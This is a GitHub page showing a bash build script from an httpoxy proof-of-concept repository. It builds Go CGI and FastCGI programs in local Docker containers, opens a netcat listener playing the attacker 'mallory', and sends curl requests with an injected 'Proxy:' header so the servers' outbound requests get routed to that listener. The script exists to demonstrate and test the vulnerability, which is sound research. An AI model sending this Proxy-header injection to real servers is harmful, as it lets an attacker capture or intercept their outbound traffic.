go-httpoxy-poc/build at master · httpoxy/go-httpoxy-poc · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
#!/usr/bin/env bash

# as in, the address that docker exposes ports on
if [ -z $DOCKER_IP ]; then
    DOCKER_IP=127.0.0.1
fi

# as in, the address of the host from within the docker containers on the default bridge network
if [ -z $DOCKER_HOST_IP ]; then
    DOCKER_HOST_IP=172.17.0.1
fi

CONTAINER_CGI=go-httpoxy-cgi
CONTAINER_FCGI=go-httpoxy-fcgi

IMAGE_CGI=go-httpoxy-poc-cgi:latest
IMAGE_FCGI=go-httpoxy-poc-fcgi:latest

MALLORY_LISTENER_PORT=12345

if [ -z $TEST_PORT_CGI ]; then
    TEST_PORT_CGI=2081
fi

if [ -z $TEST_PORT_FCGI ]; then
    TEST_PORT_FCGI=2082
fi

#GO=/usr/lib/go-tip/bin/go
if [ -z $GO ]; then
	GO=go
fi

echo "Go version:"
$GO version

echo "Building cgi"
$GO build ./cmd/cgi &

echo "Building fcgi"
$GO build ./cmd/fcgi &

wait

echo "Building docker container for cgi"
docker build -f cgi.dockerfile -t $IMAGE_CGI . &

echo "Building docker container for fcgi"
docker build -f fcgi.dockerfile -t $IMAGE_FCGI . &

wait

echo "Stopping any previous docker containers"
docker stop $CONTAINER_CGI  2>/dev/null || true
docker kill $CONTAINER_CGI  2>/dev/null || true
docker rm   $CONTAINER_CGI  2>/dev/null || true
docker stop $CONTAINER_FCGI 2>/dev/null || true
docker kill $CONTAINER_FCGI 2>/dev/null || true
docker rm   $CONTAINER_FCGI 2>/dev/null || true

echo "Starting docker container for cgi"
docker run -d \
    --name $CONTAINER_CGI \
    -p $TEST_PORT_CGI:80 \
    $IMAGE_CGI

echo "Starting docker container for fcgi"
docker run -d \
    --name $CONTAINER_FCGI \
    -p $TEST_PORT_FCGI:80 \
    $IMAGE_FCGI

echo "Wait a sec for them to dwell"
sleep 3

echo "Then start the tests"

echo
echo

echo "---------------------------------------------------------------------------------"
echo "Testing: cgi/apache..."

echo "" > ./cgi-mallory.log
nc -v -l 12345 > ./cgi-mallory.log 2>&1 &
sleep 2
curl -X GET -H "Proxy: $DOCKER_HOST_IP:$MALLORY_LISTENER_PORT" http://$DOCKER_IP:$TEST_PORT_CGI/httpoxy > ./cgi-curl.log 2>&1
pkill -f 'nc -v -l 12345'
echo "Testing done."

echo
echo
echo "Here's the curl output from the curl client"
cat ./cgi-curl.log

echo
echo
echo "Tests finished. Result time..."
echo "Here is the output from the cgi program and apache logs:"
docker exec $CONTAINER_CGI tail /var/log/apache2/*.log

echo
echo
echo "And here is what the attacker got (any output other than a listening line here means trouble)"
cat ./cgi-mallory.log
echo "end of trouble"
echo "---------------------------------------------------------------------------------"

echo
echo

echo "---------------------------------------------------------------------------------"
echo "Testing: fcgi/nginx"

echo "" > ./fcgi-mallory.log
nc -v -l 12345 > ./fcgi-mallory.log 2>&1 &
sleep 2
curl -vv -X GET -H "Proxy: $DOCKER_HOST_IP:$MALLORY_LISTENER_PORT" http://$DOCKER_IP:$TEST_PORT_FCGI/ > ./fcgi-curl.log 2>&1
pkill -f 'nc -v -l 12345'
echo "Testing done."

echo
echo
echo "Here's the curl output from the curl client"
cat ./fcgi-curl.log

echo
echo
echo "Tests finished. Result time..."
echo "Here is the nginx logs (containing output from the fcgi program)"
docker logs $CONTAINER_FCGI

echo
echo
echo "And here is what the attacker got (any output other than a listening line here means trouble)"
cat ./fcgi-mallory.log
echo "end of trouble"
echo "---------------------------------------------------------------------------------"